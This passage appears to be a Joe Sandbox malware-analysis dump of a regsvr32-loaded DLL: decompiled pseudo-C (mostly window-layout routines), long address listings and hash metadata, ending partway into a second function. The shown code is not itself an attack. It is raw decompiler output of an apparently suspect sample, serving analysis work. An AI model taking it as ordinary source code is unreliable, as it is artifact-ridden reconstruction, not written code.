																	__eflags =  *((intOrPtr*)(_t383 + _t321)) - _t408;
																	if( *((intOrPtr*)(_t383 + _t321)) != _t408) {
																		goto L83;
																	} else {
																		goto L97;
																	}
																	goto L106;
																}
															}
														}
													}
												} else {
													_v80 = r8d;
													r8d = _t378 + _t321;
													r8d =  ~r8d;
													OffsetRect(??, ??, ??);
													L97:
													_t378 =  &_v256;
													_t222 = EqualRect(??, ??);
													__eflags = _t222;
													if(_t222 == 0) {
														__eflags =  *(_t396 + 0x130) - _t222;
														if( *(_t396 + 0x130) == _t222) {
															__eflags =  *(_t422 + 0xdc) & 0x00000001;
															if(( *(_t422 + 0xdc) & 0x00000001) == 0) {
																asm("movdqu xmm0, [esp+0x20]");
																_t321 =  *((intOrPtr*)(_t422 + 0xf8));
																asm("movdqu [eax+0xac], xmm0");
															}
														}
														_t378 =  *((intOrPtr*)(_t422 + 0x40));
														_t408 =  &_v304;
														_t222 = E1000ED54(_t321,  &_v200,  *((intOrPtr*)(_t422 + 0x40)), _t408);
													}
													_t298 = _v300 -  *0x10074c94 + _v268;
													__eflags = r14d - _t222;
													_t202 =  >  ? r14d : _t222;
													_v276 = _t298;
													r14d =  >  ? r14d : _t222;
													goto L103;
												}
											} else {
												_t279 = _v256;
												r8d = _v304;
												__eflags = _t279 - r8d;
												if(_t279 > r8d) {
													__eflags =  *(_t396 + 0x100);
													if( *(_t396 + 0x100) == 0) {
														r8d = 0;
														__eflags = r8d;
														OffsetRect(??, ??, ??);
														r8d = _v304;
													}
												}
												_t274 = _v296;
												__eflags = _t274 - _t265;
												if(_t274 > _t265) {
													__eflags =  *(_t396 + 0x100);
													if( *(_t396 + 0x100) == 0) {
														_t284 = _t274 -  *0x10074c90 - r8d;
														_t269 = _t265 - _t284;
														__eflags = _t269 - _t291;
														_t286 =  >  ? _t265 - _t284 : _t291;
														_t274 = ( >  ? _t265 - _t284 : _t291) - r8d;
														r8d = 0;
														__eflags = r8d;
														OffsetRect(??, ??, ??);
														r8d = _v304;
													}
												}
												r9d = 0;
												__eflags = _v80 - r9d;
												if(_v80 == r9d) {
													__eflags = r8d - _t265 -  *0x10074c90;
													if(r8d < _t265 -  *0x10074c90) {
														goto L71;
													} else {
														_t342 = _v288;
														__eflags = _t269 - r9d;
														if(_t269 <= r9d) {
															goto L71;
														} else {
															__eflags = _t428 - _t411;
															if(_t428 < _t411) {
																L126:
																E10016544();
																asm("int3");
																L127:
																E10016544();
																asm("int3");
																break;
															} else {
																__eflags = _t428 -  *((intOrPtr*)(_t396 + 0x118));
																if(_t428 >=  *((intOrPtr*)(_t396 + 0x118))) {
																	goto L126;
																} else {
																	_t321 =  *((intOrPtr*)(_t396 + 0x110));
																	_t386 = _v240;
																	__eflags =  *((intOrPtr*)(_t386 + _t321)) - _t411;
																	if( *((intOrPtr*)(_t386 + _t321)) == _t411) {
																		goto L71;
																	} else {
																		r8d = 0;
																		__eflags = r8d;
																		L83:
																		_t378 = _t342;
																		r13d = 1;
																		_t411 = _t422;
																		_t202 = E1002D748(_t269, _t274, _t321, _t396 + 0x108, _t342, _t398, _t408, _t411, _t416);
																		_v80 = r13d;
																		L121:
																		__eflags = r14d;
																		r13d = _v56;
																		if(r14d != 0) {
																			__eflags = r13d;
																			if(r13d == 0) {
																				r14d = r14d -  *0x10074c90;
																				_t291 = _t291 + r14d;
																				__eflags =  *_t416 - _t291;
																				_t202 =  >  ?  *_t416 : _t291;
																				__eflags = _t416[1] - _t298;
																				_t302 =  >  ? _t416[1] : _t298;
																				 *_t416 =  >  ?  *_t416 : _t291;
																				_t416[1] =  >  ? _t416[1] : _t298;
																				_t303 =  *0x10074c94; // 0x2
																				_t298 =  ~_t303;
																			} else {
																				r14d = r14d -  *0x10074c94;
																				_t298 = _t298 + r14d;
																				__eflags =  *_t416 - _t291;
																				_t292 =  >  ?  *_t416 : _t291;
																				__eflags = _t416[1] - _t298;
																				_t202 =  >  ? _t416[1] : _t298;
																				 *_t416 =  >  ?  *_t416 : _t291;
																				_t416[1] =  >  ? _t416[1] : _t298;
																				_t293 =  *0x10074c90; // 0x2
																				_t291 =  ~_t293;
																			}
																			_v276 = _t298;
																			_v280 = _t291;
																			r14d = 0;
																		}
																	}
																	goto L106;
																}
															}
														}
													}
												} else {
													_v80 = r9d;
													r8d = 0;
													__eflags = r8d;
													OffsetRect(??, ??, ??);
													L71:
													_t232 = EqualRect();
													__eflags = _t232;
													if(_t232 == 0) {
														__eflags =  *(_t396 + 0x130) - _t232;
														if( *(_t396 + 0x130) == _t232) {
															__eflags =  *(_t422 + 0xdc) & 0x00000001;
															if(( *(_t422 + 0xdc) & 0x00000001) == 0) {
																asm("movdqu xmm0, [esp+0x20]");
																_t321 =  *((intOrPtr*)(_t422 + 0xf8));
																asm("movdqu [eax+0xac], xmm0");
															}
														}
														_t408 =  &_v304;
														E1000ED54(_t321,  &_v200,  *((intOrPtr*)(_t422 + 0x40)), _t408);
													}
													_t233 = _v268;
													_t291 = _v272 -  *0x10074c90 + _v304;
													__eflags = r14d - _t233;
													_t234 =  >  ? r14d : _t233;
													_v280 = _t291;
													r14d =  >  ? r14d : _t233;
													L104:
													_t378 =  &_v200;
													_t202 =  *((intOrPtr*)( *_t422 + 0x2b0))();
													L105:
													r13d = _v56;
													L106:
													_t428 = _v208;
													_t269 = _v288 + 1;
													_v240 = _v216;
													_t321 = _t269;
													_v288 = _t269;
													__eflags = _t321 -  *((intOrPtr*)(_t396 + 0x118));
													if(_t321 <  *((intOrPtr*)(_t396 + 0x118))) {
														continue;
													} else {
														_t321 = _v200;
														r15d = _v64;
														goto L108;
													}
												}
											}
										}
									}
								}
								goto L134;
							}
							_t209 = E10016544();
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t331);
							_push(_t400);
							_push(_t398);
							_push(_t396);
							_t266 = 0;
							_t299 = _t274;
							_t397 = _t342;
							__eflags =  *((intOrPtr*)(_t342 + 0x118)) - _t331;
							if( *((intOrPtr*)(_t342 + 0x118)) > _t331) {
								do {
									_t209 = L10016AB8(_t209, _t266, _t266, _t397, _t378, _t411);
									__eflags = _t321;
									_t399 = _t321;
									if(_t321 != 0) {
										E1001D2FC(_t321, _t321);
										r9d = 1;
										r8d = _t299;
										_t378 = _t399;
										_t209 = E1001E4D8(_t269, _t321, _t399);
									}
									_t266 = _t266 + 1;
									_t321 = _t266;
									__eflags = _t321 -  *((intOrPtr*)(_t397 + 0x118));
								} while (_t321 <  *((intOrPtr*)(_t397 + 0x118)));
							}
							return _t209;
						}
					} else {
						__eflags = _t335 -  *((intOrPtr*)(_t395 + 0x118));
						if(_t335 >=  *((intOrPtr*)(_t395 + 0x118))) {
							goto L42;
						} else {
							_t321 =  *((intOrPtr*)(_t395 + 0x110));
							__eflags =  *((long long*)(_t321 + _t335 * 8));
							if( *((long long*)(_t321 + _t335 * 8)) != 0) {
								L30:
								__eflags = _t296 - 0xffffffff;
								if(_t296 != 0xffffffff) {
									E10016FB8(_t265, _t267, _t289, _t321, _t395, _t420, _t408, _t411, _t412, _t415, _t420, _t424, _t426);
								}
								goto L32;
							} else {
								__eflags = r12d;
								if(r12d < 0) {
									L35:
									E10016544();
									asm("int3");
									goto L36;
								} else {
									__eflags = _t415 -  *((intOrPtr*)(_t395 + 0x118));
									if(_t415 >=  *((intOrPtr*)(_t395 + 0x118))) {
										goto L35;
									} else {
										__eflags =  *((long long*)(_t321 + _t415 * 8));
										if( *((long long*)(_t321 + _t415 * 8)) == 0) {
											_t29 = _t395 + 0x108; // 0x109
											_t408 = _t426;
											E1002D82C(_t267, _t273, _t29, _t415, _t426);
										}
										goto L30;
									}
								}
							}
							goto L34;
						}
					}
				} else {
					if(_t193 < 0 || _t415 >=  *((intOrPtr*)(_t395 + 0x118))) {
						L22:
						E10016544();
						asm("int3");
						goto L23;
					} else {
						_t330 =  *((intOrPtr*)(_t395 + 0x110));
						_t267 = GetDlgCtrlID(??) & 0x0000ffff;
						 *((long long*)(_t330 + _t415 * 8)) =  *((intOrPtr*)(_t420 + 0x40));
						if(r12d < 0 || _t415 >=  *((intOrPtr*)(_t395 + 0x118))) {
							L21:
							E10016544();
							asm("int3");
							goto L22;
						} else {
							r8d = r12d;
							if(E10016A60(_t265, _t273, _t395,  *((intOrPtr*)( *((intOrPtr*)(_t395 + 0x110)) + _t415 * 8)), _t411, _t412) <= 0) {
								L32:
								if( *((long long*)(_t420 + 0xf8)) != 0) {
									L36:
									E1001D2FC(_t321, _t395);
									__eflags =  *(_t395 + 0x100);
									_t332 = _t321;
									if( *(_t395 + 0x100) == 0) {
										L41:
										 *(_t332 + 0x170) =  *(_t332 + 0x170) | 0x0000000c;
										goto L33;
									} else {
										_t248 =  *((intOrPtr*)( *_t395 + 0x2e0))();
										__eflags = _t248;
										if(_t248 != 0) {
											goto L41;
										} else {
											_t249 = E10016F20(_t321, _t395);
											_t368 = _t332;
											__eflags = _t249;
											if(_t249 != 0) {
												E10016154(_t368);
												goto L33;
											} else {
												 *((intOrPtr*)( *_t332 + 0xc0))();
												_t247 = r15d;
											}
										}
									}
								} else {
									L33:
									_t247 = 0;
								}
								L34:
								return _t247;
							} else {
								_t10 = _t395 + 0x108; // 0x109
								E1002D82C(_t267, _t273, _t10, _t415, _t426);
								r11d = _t415 - 1;
								_t374 = r11d;
								if(r11d < 0 || _t374 >=  *((intOrPtr*)(_t395 + 0x118))) {
									L20:
									E10016544();
									asm("int3");
									goto L21;
								} else {
									_t321 =  *((intOrPtr*)(_t395 + 0x110));
									if( *((long long*)(_t321 + _t374 * 8)) != 0) {
										goto L32;
									} else {
										if(r12d < 0 || _t415 >=  *((intOrPtr*)(_t395 + 0x118))) {
											E10016544();
											asm("int3");
											goto L20;
										} else {
											if( *((long long*)(_t321 + _t415 * 8)) == 0) {
												_t19 = _t395 + 0x108; // 0x109
												E1002D82C(_t267, _t273, _t19, _t415, _t426);
											}
											goto L32;
										}
									}
								}
							}
						}
					}
				}
				L134:
			}



























































































                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017064
                                                                              0x10017069
                                                                              0x1001706d
                                                                              0x10017076
                                                                              0x10017079
                                                                              0x1001707c
                                                                              0x1001707f
                                                                              0x10017081
                                                                              0x10017086
                                                                              0x10017086
                                                                              0x1001708a
                                                                              0x1001708c
                                                                              0x10017091
                                                                              0x10017091
                                                                              0x10017092
                                                                              0x10017099
                                                                              0x1001709c
                                                                              0x1001709e
                                                                              0x100170a3
                                                                              0x100170a3
                                                                              0x100170a4
                                                                              0x100170ad
                                                                              0x10017196
                                                                              0x10017196
                                                                              0x1001719d
                                                                              0x100171a0
                                                                              0x100171a3
                                                                              0x100171a8
                                                                              0x100171ad
                                                                              0x100171b0
                                                                              0x100171b3
                                                                              0x1001727f
                                                                              0x1001727f
                                                                              0x10017284
                                                                              0x10017285
                                                                              0x10017286
                                                                              0x10017287
                                                                              0x10017288
                                                                              0x1001728d
                                                                              0x10017292
                                                                              0x10017294
                                                                              0x10017295
                                                                              0x10017296
                                                                              0x10017298
                                                                              0x1001729a
                                                                              0x1001729c
                                                                              0x100172a5
                                                                              0x100172a8
                                                                              0x100172ab
                                                                              0x100172ae
                                                                              0x100172b1
                                                                              0x100172b4
                                                                              0x100172b6
                                                                              0x100172bb
                                                                              0x100172bb
                                                                              0x100172bc
                                                                              0x100172c8
                                                                              0x100172ce
                                                                              0x100172d1
                                                                              0x100172d3
                                                                              0x10017308
                                                                              0x1001730d
                                                                              0x10017310
                                                                              0x10017312
                                                                              0x10017317
                                                                              0x10017317
                                                                              0x10017318
                                                                              0x1001731c
                                                                              0x10017321
                                                                              0x10017327
                                                                              0x10017330
                                                                              0x10017335
                                                                              0x10017335
                                                                              0x100172d5
                                                                              0x100172d5
                                                                              0x100172dd
                                                                              0x100172e0
                                                                              0x100172e5
                                                                              0x100172e8
                                                                              0x100172ee
                                                                              0x100172f4
                                                                              0x100172fd
                                                                              0x10017302
                                                                              0x10017302
                                                                              0x10017339
                                                                              0x10017340
                                                                              0x10017348
                                                                              0x1001734f
                                                                              0x10017357
                                                                              0x1001735c
                                                                              0x10017368
                                                                              0x1001735e
                                                                              0x1001735e
                                                                              0x1001735e
                                                                              0x1001736e
                                                                              0x10017374
                                                                              0x1001737a
                                                                              0x1001737c
                                                                              0x1001737f
                                                                              0x10017381
                                                                              0x10017383
                                                                              0x1001738a
                                                                              0x10017392
                                                                              0x10017396
                                                                              0x1001739a
                                                                              0x1001739e
                                                                              0x100173a6
                                                                              0x100177f8
                                                                              0x100177f8
                                                                              0x100177ff
                                                                              0x10017801
                                                                              0x10017804
                                                                              0x10017809
                                                                              0x10017809
                                                                              0x10017804
                                                                              0x10017814
                                                                              0x10017822
                                                                              0x10017828
                                                                              0x1001782f
                                                                              0x10017832
                                                                              0x10017839
                                                                              0x10017839
                                                                              0x1001783d
                                                                              0x1001783f
                                                                              0x10017845
                                                                              0x10017845
                                                                              0x10017849
                                                                              0x10017849
                                                                              0x10017834
                                                                              0x10017834
                                                                              0x10017837
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10017837
                                                                              0x1001784d
                                                                              0x10017850
                                                                              0x10017857
                                                                              0x10017857
                                                                              0x1001785c
                                                                              0x1001785e
                                                                              0x10017864
                                                                              0x10017864
                                                                              0x10017868
                                                                              0x10017868
                                                                              0x10017852
                                                                              0x10017852
                                                                              0x10017855
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10017855
                                                                              0x10017883
                                                                              0x100173ac
                                                                              0x100173ac
                                                                              0x100173ac
                                                                              0x100173b0
                                                                              0x100173b9
                                                                              0x100173b9
                                                                              0x100173be
                                                                              0x100173c3
                                                                              0x100173c3
                                                                              0x100173c7
                                                                              0x100173ca
                                                                              0x100173cd
                                                                              0x100173d5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100173db
                                                                              0x100173e2
                                                                              0x00000000
                                                                              0x100173e8
                                                                              0x100173f4
                                                                              0x100173f8
                                                                              0x100173fb
                                                                              0x100173ff
                                                                              0x10017404
                                                                              0x10017884
                                                                              0x10017887
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001740a
                                                                              0x10017411
                                                                              0x10017417
                                                                              0x10017419
                                                                              0x10017794
                                                                              0x10017794
                                                                              0x1001779c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001741f
                                                                              0x1001741f
                                                                              0x10017426
                                                                              0x10017428
                                                                              0x10017436
                                                                              0x1001743d
                                                                              0x10017440
                                                                              0x10017444
                                                                              0x10017444
                                                                              0x1001742a
                                                                              0x1001742a
                                                                              0x1001742c
                                                                              0x00000000
                                                                              0x1001742e
                                                                              0x1001742e
                                                                              0x1001742e
                                                                              0x1001742c
                                                                              0x10017451
                                                                              0x1001745a
                                                                              0x10017460
                                                                              0x1001746a
                                                                              0x1001746d
                                                                              0x10017471
                                                                              0x10017475
                                                                              0x10017484
                                                                              0x1001748c
                                                                              0x10017490
                                                                              0x10017496
                                                                              0x1001749e
                                                                              0x100174a3
                                                                              0x100174ab
                                                                              0x10017638
                                                                              0x1001763d
                                                                              0x10017641
                                                                              0x10017644
                                                                              0x10017646
                                                                              0x1001764d
                                                                              0x1001764f
                                                                              0x10017657
                                                                              0x10017659
                                                                              0x1001765f
                                                                              0x1001765f
                                                                              0x1001764d
                                                                              0x10017663
                                                                              0x10017668
                                                                              0x1001766d
                                                                              0x1001766f
                                                                              0x10017676
                                                                              0x10017680
                                                                              0x10017683
                                                                              0x1001768a
                                                                              0x10017690
                                                                              0x10017693
                                                                              0x1001769a
                                                                              0x1001769e
                                                                              0x100176a1
                                                                              0x100176a3
                                                                              0x100176a9
                                                                              0x100176a9
                                                                              0x10017676
                                                                              0x100176ad
                                                                              0x100176b0
                                                                              0x100176b8
                                                                              0x100176e8
                                                                              0x100176ea
                                                                              0x00000000
                                                                              0x100176ec
                                                                              0x100176ec
                                                                              0x100176f1
                                                                              0x100176f4
                                                                              0x00000000
                                                                              0x100176f6
                                                                              0x100176f6
                                                                              0x100176f9
                                                                              0x00000000
                                                                              0x100176ff
                                                                              0x100176ff
                                                                              0x10017706
                                                                              0x00000000
                                                                              0x1001770c
                                                                              0x1001770c
                                                                              0x10017713
                                                                              0x10017718
                                                                              0x1001771c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001771c
                                                                              0x10017706
                                                                              0x100176f9
                                                                              0x100176f4
                                                                              0x100176ba
                                                                              0x100176c0
                                                                              0x100176cd
                                                                              0x100176d3
                                                                              0x100176d6
                                                                              0x10017722
                                                                              0x10017722
                                                                              0x1001772c
                                                                              0x10017732
                                                                              0x10017734
                                                                              0x10017736
                                                                              0x1001773c
                                                                              0x1001773e
                                                                              0x10017746
                                                                              0x10017748
                                                                              0x1001774e
                                                                              0x10017755
                                                                              0x10017755
                                                                              0x10017746
                                                                              0x1001775d
                                                                              0x10017761
                                                                              0x1001776e
                                                                              0x1001776e
                                                                              0x10017782
                                                                              0x10017786
                                                                              0x10017789
                                                                              0x1001778d
                                                                              0x10017791
                                                                              0x00000000
                                                                              0x10017791
                                                                              0x100174b1
                                                                              0x100174b1
                                                                              0x100174b5
                                                                              0x100174ba
                                                                              0x100174bd
                                                                              0x100174bf
                                                                              0x100174c6
                                                                              0x100174d0
                                                                              0x100174d0
                                                                              0x100174d3
                                                                              0x100174d9
                                                                              0x100174d9
                                                                              0x100174c6
                                                                              0x100174de
                                                                              0x100174e2
                                                                              0x100174e4
                                                                              0x100174e6
                                                                              0x100174ed
                                                                              0x100174f9
                                                                              0x100174fc
                                                                              0x10017502
                                                                              0x10017509
                                                                              0x1001750c
                                                                              0x1001750f
                                                                              0x1001750f
                                                                              0x10017512
                                                                              0x10017518
                                                                              0x10017518
                                                                              0x100174ed
                                                                              0x1001751d
                                                                              0x10017520
                                                                              0x10017528
                                                                              0x100175cd
                                                                              0x100175d0
                                                                              0x00000000
                                                                              0x100175d6
                                                                              0x100175d6
                                                                              0x100175db
                                                                              0x100175de
                                                                              0x00000000
                                                                              0x100175e4
                                                                              0x100175e4
                                                                              0x100175e7
                                                                              0x10017917
                                                                              0x10017917
                                                                              0x1001791c
                                                                              0x1001791d
                                                                              0x1001791d
                                                                              0x10017922
                                                                              0x00000000
                                                                              0x100175ed
                                                                              0x100175ed
                                                                              0x100175f4
                                                                              0x00000000
                                                                              0x100175fa
                                                                              0x100175fa
                                                                              0x10017601
                                                                              0x10017606
                                                                              0x1001760a
                                                                              0x00000000
                                                                              0x10017610
                                                                              0x10017610
                                                                              0x10017610
                                                                              0x10017613
                                                                              0x10017613
                                                                              0x10017616
                                                                              0x10017623
                                                                              0x10017626
                                                                              0x1001762b
                                                                              0x1001788d
                                                                              0x1001788d
                                                                              0x10017890
                                                                              0x10017898
                                                                              0x1001789e
                                                                              0x100178a1
                                                                              0x100178d6
                                                                              0x100178dd
                                                                              0x100178e0
                                                                              0x100178e6
                                                                              0x100178eb
                                                                              0x100178f0
                                                                              0x100178f6
                                                                              0x100178fa
                                                                              0x100178ff
                                                                              0x10017905
                                                                              0x100178a3
                                                                              0x100178a3
                                                                              0x100178aa
                                                                              0x100178ad
                                                                              0x100178b1
                                                                              0x100178b6
                                                                              0x100178bd
                                                                              0x100178c3
                                                                              0x100178c7
                                                                              0x100178cc
                                                                              0x100178d2
                                                                              0x100178d2
                                                                              0x10017907
                                                                              0x1001790b
                                                                              0x1001790f
                                                                              0x1001790f
                                                                              0x10017898
                                                                              0x00000000
                                                                              0x1001760a
                                                                              0x100175f4
                                                                              0x100175e7
                                                                              0x100175de
                                                                              0x1001752e
                                                                              0x10017539
                                                                              0x10017544
                                                                              0x10017544
                                                                              0x10017549
                                                                              0x1001754f
                                                                              0x10017559
                                                                              0x1001755f
                                                                              0x10017561
                                                                              0x10017563
                                                                              0x10017569
                                                                              0x1001756b
                                                                              0x10017573
                                                                              0x10017575
                                                                              0x1001757b
                                                                              0x10017582
                                                                              0x10017582
                                                                              0x10017573
                                                                              0x1001758e
                                                                              0x1001759b
                                                                              0x1001759b
                                                                              0x100175a0
                                                                              0x100175ae
                                                                              0x100175b2
                                                                              0x100175b5
                                                                              0x100175b9
                                                                              0x100175bd
                                                                              0x1001779e
                                                                              0x100177a2
                                                                              0x100177ad
                                                                              0x100177b3
                                                                              0x100177b3
                                                                              0x100177bb
                                                                              0x100177c4
                                                                              0x100177cc
                                                                              0x100177cf
                                                                              0x100177d4
                                                                              0x100177d7
                                                                              0x100177db
                                                                              0x100177e2
                                                                              0x00000000
                                                                              0x100177e8
                                                                              0x100177e8
                                                                              0x100177f0
                                                                              0x00000000
                                                                              0x100177f0
                                                                              0x100177e2
                                                                              0x10017528
                                                                              0x100174ab
                                                                              0x10017419
                                                                              0x10017404
                                                                              0x00000000
                                                                              0x100173e2
                                                                              0x10017923
                                                                              0x10017928
                                                                              0x10017929
                                                                              0x1001792a
                                                                              0x1001792b
                                                                              0x1001792c
                                                                              0x1001792e
                                                                              0x1001792f
                                                                              0x10017930
                                                                              0x10017935
                                                                              0x10017937
                                                                              0x10017939
                                                                              0x1001793c
                                                                              0x10017943
                                                                              0x10017945
                                                                              0x1001794a
                                                                              0x1001794f
                                                                              0x10017952
                                                                              0x10017955
                                                                              0x1001795a
                                                                              0x1001795f
                                                                              0x10017965
                                                                              0x1001796b
                                                                              0x1001796e
                                                                              0x1001796e
                                                                              0x10017973
                                                                              0x10017976
                                                                              0x10017979
                                                                              0x10017979
                                                                              0x10017945
                                                                              0x1001798a
                                                                              0x1001798a
                                                                              0x100171b9
                                                                              0x100171b9
                                                                              0x100171c0
                                                                              0x00000000
                                                                              0x100171c6
                                                                              0x100171c6
                                                                              0x100171cd
                                                                              0x100171d2
                                                                              0x100171fb
                                                                              0x100171fb
                                                                              0x100171fe
                                                                              0x10017206
                                                                              0x10017206
                                                                              0x00000000
                                                                              0x100171d4
                                                                              0x100171d4
                                                                              0x100171d7
                                                                              0x10017226
                                                                              0x10017226
                                                                              0x1001722b
                                                                              0x00000000
                                                                              0x100171d9
                                                                              0x100171d9
                                                                              0x100171e0
                                                                              0x00000000
                                                                              0x100171e2
                                                                              0x100171e2
                                                                              0x100171e7
                                                                              0x100171e9
                                                                              0x100171f0
                                                                              0x100171f6
                                                                              0x100171f6
                                                                              0x00000000
                                                                              0x100171e7
                                                                              0x100171e0
                                                                              0x100171d7
                                                                              0x00000000
                                                                              0x100171d2
                                                                              0x100171c0
                                                                              0x100170b3
                                                                              0x100170b5
                                                                              0x10017190
                                                                              0x10017190
                                                                              0x10017195
                                                                              0x00000000
                                                                              0x100170c8
                                                                              0x100170cc
                                                                              0x100170dc
                                                                              0x100170df
                                                                              0x100170e3
                                                                              0x1001718a
                                                                              0x1001718a
                                                                              0x1001718f
                                                                              0x00000000
                                                                              0x100170f6
                                                                              0x100170fd
                                                                              0x1001710e
                                                                              0x1001720b
                                                                              0x10017213
                                                                              0x1001722c
                                                                              0x1001722f
                                                                              0x10017234
                                                                              0x1001723b
                                                                              0x1001723e
                                                                              0x10017276
                                                                              0x10017276
                                                                              0x00000000
                                                                              0x10017240
                                                                              0x10017246
                                                                              0x1001724c
                                                                              0x1001724e
                                                                              0x00000000
                                                                              0x10017250
                                                                              0x10017253
                                                                              0x10017258
                                                                              0x1001725b
                                                                              0x1001725d
                                                                              0x1001726f
                                                                              0x00000000
                                                                              0x1001725f
                                                                              0x10017262
                                                                              0x10017268
                                                                              0x10017268
                                                                              0x1001725d
                                                                              0x1001724e
                                                                              0x10017215
                                                                              0x10017215
                                                                              0x10017215
                                                                              0x10017215
                                                                              0x10017217
                                                                              0x10017225
                                                                              0x10017114
                                                                              0x10017114
                                                                              0x10017121
                                                                              0x10017126
                                                                              0x1001712e
                                                                              0x10017131
                                                                              0x10017184
                                                                              0x10017184
                                                                              0x10017189
                                                                              0x00000000
                                                                              0x1001713c
                                                                              0x1001713c
                                                                              0x10017148
                                                                              0x00000000
                                                                              0x1001714e
                                                                              0x10017151
                                                                              0x1001717e
                                                                              0x10017183
                                                                              0x00000000
                                                                              0x1001715c
                                                                              0x10017161
                                                                              0x10017167
                                                                              0x10017174
                                                                              0x10017174
                                                                              0x00000000
                                                                              0x10017161
                                                                              0x10017151
                                                                              0x10017148
                                                                              0x10017131
                                                                              0x1001710e
                                                                              0x100170e3
                                                                              0x100170b5
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Ctrl
                                                                              • String ID:
                                                                              • API String ID: 2719014468-0
                                                                              • Opcode ID: ce29d5883a164e47dbb587759d7beb735491962e2b54d34e5f694e5ffa6052e5
                                                                              • Instruction ID: 4d3e0fee08e3694312e15032820d39457d21dbb6623d34b5d29c8320fe00c3fa
                                                                              • Opcode Fuzzy Hash: ce29d5883a164e47dbb587759d7beb735491962e2b54d34e5f694e5ffa6052e5
                                                                              • Instruction Fuzzy Hash: 2632BD36304A8587DB29CF29E94479A77B1F788B84F418115EF9D4BA08DF78E9D5CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10032FF8 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 373windowstringCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E10032FF8(void* __ecx, void* __edx, intOrPtr* __rcx, intOrPtr* __rdx, signed int __r8, void* __r9, void* __r11, void* __r12, void* __r14) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r13;
				signed long long _t117;
				signed int _t118;
				void* _t120;
				signed long long _t130;
				signed int _t135;
				signed long long _t136;
				signed long long _t153;
				void* _t169;
				void* _t178;
				signed int _t181;
				signed long long _t207;
				signed long long _t208;
				signed long long _t209;
				intOrPtr _t211;
				intOrPtr* _t212;
				intOrPtr _t213;
				intOrPtr* _t214;
				intOrPtr _t215;
				signed long long _t218;
				intOrPtr* _t225;
				signed long long _t226;
				intOrPtr* _t228;
				signed long long _t229;
				intOrPtr _t230;
				intOrPtr* _t235;
				intOrPtr* _t264;
				void* _t265;
				intOrPtr* _t266;
				intOrPtr* _t268;
				void* _t269;
				intOrPtr* _t274;
				intOrPtr* _t276;
				intOrPtr _t279;
				intOrPtr* _t284;
				signed short* _t285;
				void* _t286;
				intOrPtr* _t287;
				signed long long _t289;
				void* _t290;
				intOrPtr* _t291;
				signed long long _t293;
				void* _t294;
				signed long long _t295;
				signed long long _t296;
				void* _t304;
				void* _t305;
				void* _t307;
				intOrPtr* _t308;
				intOrPtr* _t309;
				void* _t310;
				void* _t315;

				_t315 = __r14;
				_t310 = __r12;
				_t307 = __r11;
				_t304 = __r9;
				_t299 = __r8;
				_t264 = __rdx;
				_t228 = __rcx;
				_t189 = __edx;
				_t182 = __ecx;
				_t295 = _t294 - 0x248;
				_t207 =  *0x1006f4c8; // 0x6f13091946cb
				_t208 = _t207 ^ _t295;
				 *(_t295 + 0x230) = _t208;
				_t225 = __rdx;
				_t284 = __rcx;
				if(__rdx == 0) {
					L12:
					r8d = 0;
					_t18 = _t299 - 1; // -1
					_t190 = _t18;
					_t19 = _t264 + 4; // 0x3
					_t183 = _t19;
					E10031BE4(_t19, _t18, __eflags, _t208, _t225, _t228, _t264, _t284, _t286, _t299);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t225);
					_push(_t290);
					_push(_t286);
					_push(_t284);
					_push(_t310);
					_t296 = _t295 - 0x290;
					 *((long long*)(_t296 + 0x50)) = 0xfffffffe;
					_t209 =  *0x1006f4c8; // 0x6f13091946cb
					 *(_t296 + 0x280) = _t209 ^ _t296;
					_t287 = _t264;
					_t291 = _t228;
					_t264 = _t264 == 0;
					if(_t264 == 0) {
						E10016544();
						asm("int3");
					}
					_t229 =  *((intOrPtr*)(_t264 + 0x10));
					_t211 =  *((intOrPtr*)(_t291 + 0x30));
					__eflags =  *(_t211 - 0x10);
					if( *(_t211 - 0x10) == 0) {
						__eflags = _t229;
						if(_t229 != 0) {
							r9d = 0;
							__eflags = r9d;
							_t299 = _t291 + 0x30;
							_t190 =  *((intOrPtr*)(_t264 + 8));
							E1002AE04( *((intOrPtr*)(_t264 + 8)), _t211, _t229, _t264, _t291 + 0x30, _t304, _t307);
						}
					}
					_t212 =  *((intOrPtr*)(_t291 + 0x10));
					_t230 =  *_t212;
					__eflags =  *(_t230 - 0x10);
					if( *(_t230 - 0x10) != 0) {
						__eflags =  *((long long*)(_t287 + 0x10));
						if( *((long long*)(_t287 + 0x10)) != 0) {
							_t178 = 0;
							__eflags =  *(_t291 + 8);
							if( *(_t291 + 8) > 0) {
								do {
